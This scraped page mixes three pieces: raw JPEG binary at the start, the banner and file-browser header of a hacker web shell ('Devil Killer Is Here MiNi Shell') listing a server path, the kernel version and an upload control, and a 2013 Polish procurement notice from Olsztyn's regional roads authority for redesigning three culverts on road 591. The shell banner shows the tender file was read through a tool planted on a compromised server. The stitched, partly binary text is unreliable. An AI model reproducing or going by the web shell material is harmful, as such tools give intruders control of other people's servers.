JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131220/530438-N-2013.html

<p class="kh_header"><b>Olsztyn: Opracowanie dokumentacji projektowej na: 
1) Przebudowa przepustu w km 42+855 drogi nr 591 w msc. Łazdoje
2) Przebudowa przepustu w km 34+288 drogi nr 591 koło msc. Muławki  
3) Przebudowa przepustu w km 44+420 drogi nr 591 koło msc.  Rydwągi</b><br>
<b>Numer ogłoszenia: 530438 - 2013; data zamieszczenia: 20.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Pstrowskiego 28b, 10-602 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5346265 w. 22, faks 089 5399876.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na: 
1) Przebudowa przepustu w km 42+855 drogi nr 591 w msc. Łazdoje
2) Przebudowa przepustu w km 34+288 drogi nr 591 koło msc. Muławki  
3) Przebudowa przepustu w km 44+420 drogi nr 591 koło msc.  Rydwągi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie w szczególności:
- aktualnej mapy sytuacyjno - wysokościowej do celów projektowych; dokumentacji geotechnicznej (6 egz.);
- inwentaryzacji stanu istniejącego; projektu budowlanego ( 6 egz.) wraz z niezbędnymi opiniami, uzgodnieniami i decyzjami administracyjnymi; niezbędnych materiałów do uzyskania Pozwolenia na Budowę (wraz z uzyskaniem Pozwolenia oraz z decyzją lokalizacyjną jeżeli jest wymagana) bądź w przypadku trybu decyzji ZRID wszystkich niezbędnych materiałów do złożenia wniosku o uzyskanie decyzji o zezwoleniu na realizacje inwestycji drogowej (ZRID) w tym załączników do decyzji ZRID, podziałów nieruchomości, wykazu właścicieli gruntów, ustalenie granic w terenie itp.; projektu wykonawczego  ( 6 egz.) wraz z:
- specyfikacjami technicznymi wykonania i odbioru robót budowlanych (STWiORB), przedmiarem robót, zatwierdzonym projektem organizacji ruchu na czas prowadzenia robót;
- kosztorysu ofertowego (stanowiącego wzór do wypełnienia przez Wykonawców robót bud.) i kosztorysu inwestorskiego - 2 egz. Kosztorys inwestorski powinien być sporządzony zgodnie z rozporządzeniem Ministra  Infrastruktury z dnia 18 maja 2004 roku w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389) i powinien, oprócz wyceny robót budowlanych wynikających z budowy nowego przepustu, uwzględniać koszty utrzymania drogi objazdowej. Do Wykonawcy należy także wykonanie:
- operatu wodnoprawnego,
- ewentualnych projektów branżowych, informacji dotyczącej bezpieczeństwa i ochrony zdrowia (zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. 
w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże i udokumentuje, że w okresie ostatnich trzech lat przed upływem terminu składnia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał dwie główne usługi, których przedmiotem było opracowanie dokumentacji projektowych w zakresie budowy / przebudowy przepustów lub budowy / przebudowy mostów.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że powyższy warunek spełnia co najmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże             i udokumentuje, że dysponuje/będzie dysponować osobami, zdolnymi do wykonania niniejszego zamówienia na stanowiskach wymienionych poniżej. Wskazane osoby muszą posiadać kwalifikacje i doświadczenie zawodowe nie mniejsze niż określone poniżej:
-	1 osoba kadry technicznej do wykonywania funkcji projektanta, posiadająca uprawnienia do projektowania w branży mostowej, minimalne doświadczenie  
w realizacji dokumentacji projektowych: wykonał min. 1 zamówienie, polegające na opracowaniu dokumentacji projektowej budowy /przebudowy/ remontu przepustu/mostu lub 1 osoba kadry technicznej do wykonywania funkcji projektanta, posiadająca uprawnienia budowlane obejmujące swoim zakresem przepusty - ilość osób - 1 min. Doświadczenie w opracowaniu - min. 2 opracowania polegające na opracowaniu dokumentacji projektowej budowy /przebudowy/ remontu przepustu/mostu.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że powyższy warunek spełnia co najmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Olsztyn, ul. Pstrowskiego 28B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 10:00, miejsce: Olsztyn, ul. Pstrowskiego 28B, pok. 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: 
Przebudowa przepustu w km 42+855 drogi nr 591 w msc. Łazdoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dla Części nr 1 obejmuje wykonanie w szczególności:
- aktualnej mapy sytuacyjno - wysokościowej do celów projektowych; dokumentacji geotechnicznej (6 egz.);
- inwentaryzacji stanu istniejącego; projektu budowlanego ( 6 egz.) wraz z niezbędnymi opiniami, uzgodnieniami i decyzjami administracyjnymi; niezbędnych materiałów do uzyskania Pozwolenia na Budowę (wraz z uzyskaniem Pozwolenia oraz z decyzją lokalizacyjną jeżeli jest wymagana) bądź w przypadku trybu decyzji ZRID wszystkich niezbędnych materiałów do złożenia wniosku o uzyskanie decyzji o zezwoleniu na realizacje inwestycji drogowej (ZRID) w tym załączników do decyzji ZRID, podziałów nieruchomości, wykazu właścicieli gruntów, ustalenie granic w terenie itp.; projektu wykonawczego  ( 6 egz.) wraz z:
- specyfikacjami technicznymi wykonania i odbioru robót budowlanych (STWiORB), przedmiarem robót, zatwierdzonym projektem organizacji ruchu na czas prowadzenia robót;
- kosztorysu ofertowego (stanowiącego wzór do wypełnienia przez Wykonawców robót bud.) i kosztorysu inwestorskiego - 2 egz. Kosztorys inwestorski powinien być sporządzony zgodnie z rozporządzeniem Ministra  Infrastruktury z dnia 18 maja 2004 roku w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389) i powinien, oprócz wyceny robót budowlanych wynikających z budowy nowego przepustu, uwzględniać koszty utrzymania drogi objazdowej. Do Wykonawcy należy także wykonanie:
- operatu wodnoprawnego,
- ewentualnych projektów branżowych, informacji dotyczącej bezpieczeństwa i ochrony zdrowia (zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. 
w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126).

3.1.2.	Zakres przedsięwzięcia dla Części nr 1:
Lokalizacja obiektu:
województwo: warmińsko - mazurskie
powiat: kętrzyński
gmina: Kętrzyn
Opis stanu istniejącego:
Istniejący przepust będący przedmiotem zamówienia to obiekt o konstrukcji kamienno ceglanej, o świetle poziomym 2,20 m, i świetle pionowym 2,60 m. Długość obecna obiektu 21,00 m mierzona po długości kamiennych podpór (bez skrzydełek). Brak balustrad. Przepust usytuowany jest pod kątem 90 stopni do osi drogi w cieku bez nazwy (rów melioracyjny).
Charakterystyka obiektu po przebudowie 
- Klasa techniczna drogi		- G
- nośność obiektu			- klasa A wg PN-85/S-10030;
- szerokość jezdni/poboczy	- należy dopasować do projektu przebudowy skrzyżowania 
- pochylenie skarp			- 1 : 1,5
Preferowana jest przebudowa na przepust stalowy, żelbetowy (skrzynkowy) lub
z termoutwardzalnego tworzywa sztucznego, polegająca na wykonaniu nowego przepustu pod istniejącą konstrukcją z wypełnieniem przestrzeni pomiędzy nimi ciekłym betonem. światło przepustu ustalone na podstawie obliczeń hydraulicznych powinno spełniać wymagania rozporządzenia Ministra Transport i Gospodarki Morskiej z dnia 30 maja 2000 r. 
w sprawie warunków technicznych jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz. U. z 2000 r. Nr 63, poz. 735 z późniejszymi zmianami). W przypadku niemożliwości wykonania nowego przepustu w istniejącej konstrukcji z powodu niewystarczającego światła, które określono w obliczeniach hydraulicznych, należy przewidzieć rozbiórkę istniejącego przepustu. Rzędną posadowienia należy uzgodnić 
z właściwym Oddziałem Rejonowym Zarządu Melioracji i Urządzeń Wodnych. Urządzenia bezpieczeństwa ruchu na przepuście (bariery ochronne) muszą spełniać wymagania w/w rozporządzenia. Roboty powinny być wykonywane bez zamykania drogi dla ruchu kołowego, jedynie z utrudnieniami wynikającymi z konieczności wyłączania z ruchu połowy jezdni, na poszczególnych etapach robót. Oznakowanie terenu robót przedstawia projekt organizacji ruchu, który będzie integralną częścią niniejszej dokumentacji technicznej. W przypadku konieczności rozbiórki istniejącego przepustu należy zaprojektować drogę objazdową 
z przepustem lub mostem objazdowym.
Uwaga! Zarząd Dróg Wojewódzkich w Olsztynie posiada projekt przebudowy odcinka drogi wojewódzkiej nr 591, na który zlokalizowany jest przedmiotowy przepust. W związku 
z powyższym parametry geometryczne przepustu muszą być zgodne z tym projektem.
ETAP 1 - opracowanie koncepcji projektowej- czas wykonania do 1 miesiąca od daty podpisania umowy
ETAP 2 - po zaakceptowaniu przez Zamawiającego koncepcji wykonanie docelowego projektu - czas wykonania do 30 kwietnia 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: 
Przebudowa przepustu w km 34+288 drogi nr 591 koło msc. Muławki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dla Części nr 2 obejmuje wykonanie w szczególności:
- aktualnej mapy sytuacyjno - wysokościowej do celów projektowych;
- dokumentacji geotechnicznej (6 egz.); inwentaryzacji stanu istniejącego;
- projektu budowlanego ( 6 egz.) wraz z niezbędnymi opiniami, uzgodnieniami i decyzjami administracyjnymi; niezbędnych materiałów do uzyskania Pozwolenia na Budowę (wraz 
z uzyskaniem Pozwolenia oraz z decyzją lokalizacyjną jeżeli jest wymagana) bądź w przypadku trybu decyzji ZRID wszystkich niezbędnych materiałów do złożenia wniosku 
o uzyskanie decyzji o zezwoleniu na realizacje inwestycji drogowej (ZRID) w tym załączników do decyzji ZRID, podziałów nieruchomości, wykazu właścicieli gruntów, ustalenie granic w terenie itp.; projektu wykonawczego  ( 6 egz.) wraz z:
- specyfikacjami technicznymi wykonania i odbioru robót budowlanych (STWiORB), przedmiarem robót,
- zatwierdzonym projektem organizacji ruchu na czas prowadzenia robót;
- kosztorysem ofertowym (stanowiącego wzór do wypełnienia przez Wykonawców robót bud.) i kosztorysem inwestorskim - 2 egz. Kosztorys inwestorski powinien być sporządzony zgodnie z rozporządzeniem Ministra  Infrastruktury z dnia 18 maja 2004 roku w sprawie określania  metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389) 
i powinien, oprócz wyceny robót budowlanych wynikających z budowy nowego przepustu, uwzględniać koszty utrzymania drogi objazdowej. Do Wykonawcy należy także wykonanie: operatu wodnoprawnego, ewentualnych projektów branżowych, informacji dotyczącej bezpieczeństwa i ochrony zdrowia (zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126).
Zakres przedsięwzięcia dla Części nr 2 :
Lokalizacja obiektu:
województwo: warmińsko - mazurskie
powiat: Kętrzyński
gmina: Kętrzyn
Opis stanu istniejącego 
Istniejący przepust będący przedmiotem zamówienia to obiekt o konstrukcji płytowej, podporach kamiennych o świetle poziomym 2,90 m i świetle pionowym 2,40 m. Nośność szacunkowa obiektu 150 kN. Długość obecna obiektu 9,50 m mierzona po długości kamiennych podpór (bez skrzydełek). Balustrady betonowe z przeciągami stalowymi. Przepust usytuowany jest pod kątem 900 do osi drogi w cieku bez nazwy (rów melioracyjny).
Charakterystyka obiektu po przebudowie: 
- Klasa techniczna drogi		- G
- nośność obiektu			- klasa A wg PN-85/S-10030;
- szerokość jezdni/poboczy	- jezdnia 6,00 m, pobocza po minimum 1,50 m)
- pochylenie skarp			- 1 : 1,5
Preferowana jest przebudowa na przepust stalowy, żelbetowy (skrzynkowy) lub
z termoutwardzalnego tworzywa sztucznego, polegająca na wykonaniu nowego przepustu pod istniejącą konstrukcją z wypełnieniem przestrzeni pomiędzy nimi ciekłym betonem. Światło przepustu ustalone na podstawie obliczeń hydraulicznych powinno spełniać wymagania rozporządzenia Ministra Transport i Gospodarki Morskiej z dnia 30 maja 2000 r. 
w sprawie warunków technicznych jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz. U. z 2000 r. Nr 63, poz. 735 z późniejszymi zmianami). Przepust po przebudowie musi mieścić się w granicach pasa drogowego.  Rzędną posadowienia należy uzgodnić z właściwym Oddziałem Rejonowym Zarządu Melioracji i Urządzeń Wodnych. Urządzenia bezpieczeństwa ruchu na przepuście (bariery ochronne) muszą spełniać wymagania w/w rozporządzenia. Roboty powinny być wykonywane bez zamykania drogi dla ruchu kołowego, jedynie z utrudnieniami wynikającymi z konieczności wyłączania z ruchu połowy jezdni, na poszczególnych etapach robót. Oznakowanie terenu robót przedstawia projekt organizacji ruchu, który będzie integralną częścią niniejszej dokumentacji technicznej.
Zatwierdzenie dokumentacji nastąpi dwuetapowo:
ETAP 1 - opracowanie koncepcji projektowej- czas wykonania do 1 miesiąca od daty podpisania umowy
ETAP 2 - po zaakceptowaniu przez Zamawiającego koncepcji wykonanie docelowego projektu - czas wykonania do 30 kwietnia 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: 
Przebudowa przepustu w km 44+420 drogi nr 591 koło msc.  Rydwągi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dla Części nr 3 obejmuje wykonanie w szczególności:
- aktualnej mapy sytuacyjno - wysokościowej do celów projektowych; dokumentacji geotechnicznej (6 egz.);
- inwentaryzacji stanu istniejącego; projektu budowlanego ( 6 egz.) wraz z niezbędnymi opiniami, uzgodnieniami i decyzjami administracyjnymi; niezbędnych materiałów do uzyskania Pozwolenia na Budowę (wraz z uzyskaniem Pozwolenia oraz z decyzją lokalizacyjną jeżeli jest wymagana) bądź w przypadku trybu decyzji ZRID wszystkich niezbędnych materiałów do złożenia wniosku o uzyskanie decyzji o zezwoleniu na realizacje inwestycji drogowej (ZRID) w tym załączników do decyzji ZRID, podziałów nieruchomości, wykazu właścicieli gruntów, ustalenie granic w terenie itp.; projektu wykonawczego  ( 6 egz.) wraz z:
- specyfikacjami technicznymi wykonania i odbioru robót budowlanych (STWiORB), przedmiarem robót, zatwierdzonym projektem organizacji ruchu na czas prowadzenia robót; kosztorysu ofertowego (stanowiącego wzór do wypełnienia przez Wykonawców robót bud.) i kosztorysu inwestorskiego - 2 egz. Kosztorys inwestorski powinien być sporządzony zgodnie z rozporządzeniem Ministra  Infrastruktury z dnia 18 maja 2004 roku w sprawie określania  metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389) i powinien, oprócz wyceny robót budowlanych wynikających z budowy nowego przepustu, uwzględniać koszty utrzymania drogi objazdowej. Do Wykonawcy należy także wykonanie: operatu wodnoprawnego, ewentualnych projektów branżowych, informacji dotyczącej bezpieczeństwa i ochrony zdrowia (zgodnie 
z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126).
Zakres przedsięwzięcia dla Części nr 3:
Lokalizacja obiektu
województwo: warmińsko - mazurskie
powiat: Kętrzyński
gmina: Kętrzyn
Opis stanu istniejącego 
Istniejący przepust będący przedmiotem zamówienia, to łuk ceglany o podporach kamiennych z kamiennymi skrzydełkami usytuowanymi skośnie do osi cieku.  Światło poziome wynosi na poziomie wezgłowi łuku 1,80 m i 1,60 m na poziomie fundamentów. Światło pionowe 2,40 m. Nośność szacunkowa obiektu 150 KN. Długość obecna obiektu 9,00 m mierzona po długości kamiennych podpór (bez skrzydełek). Przepust usytuowany jest pod kątem 900 do osi drogi 
w cieku bez nazwy (rów melioracyjny).
Charakterystyka obiektu po przebudowie 
- Klasa techniczna drogi		- G
- nośność obiektu			- klasa A wg PN-85/S-10030;
- szerokość jezdni/poboczy	- jezdnia 6,00 m, pobocza po minimum 1,50 m)
- pochylenie skarp			- 1 : 1,5
Preferowana jest przebudowa na przepust stalowy, żelbetowy (skrzynkowy) lub
z termoutwardzalnego tworzywa sztucznego, polegająca na wykonaniu nowego przepustu pod istniejącą konstrukcją z wypełnieniem przestrzeni pomiędzy nimi ciekłym betonem. Swiatło przepustu ustalone na podstawie obliczeń hydraulicznych powinno spełniać wymagania rozporządzenia Ministra Transport i Gospodarki Morskiej z dnia 30 maja 2000 r. 
w sprawie warunków technicznych jakim powinny odpowiadać drogowe obiekty inżynierskie 
i ich usytuowanie (Dz. U. z 2000 r. Nr 63, poz. 735 z późniejszymi zmianami). W przypadku niemożliwości wykonania nowego przepustu w istniejącej konstrukcji z powodu niewystarczającego światła, które określono w obliczeniach hydraulicznych, należy przewidzieć rozbiórkę istniejącego przepustu. Przepust po przebudowie musi mieścić się 
w granicach pasa drogowego.  Rzędną posadowienia należy uzgodnić z właściwym Oddziałem Rejonowym Zarządu Melioracji i Urządzeń Wodnych. Urządzenia bezpieczeństwa ruchu na przepuście (bariery ochronne) muszą spełniać wymagania w/w rozporządzenia. Roboty powinny być wykonywane bez zamykania drogi dla ruchu kołowego, jedynie z utrudnieniami wynikającymi z konieczności wyłączania z ruchu połowy jezdni, na poszczególnych etapach robót. Oznakowanie terenu robót przedstawia projekt organizacji ruchu, który będzie integralną częścią niniejszej dokumentacji technicznej. W przypadku konieczności rozbiórki istniejącego przepustu należy zaprojektować drogę objazdową z przepustem lub mostem objazdowym.
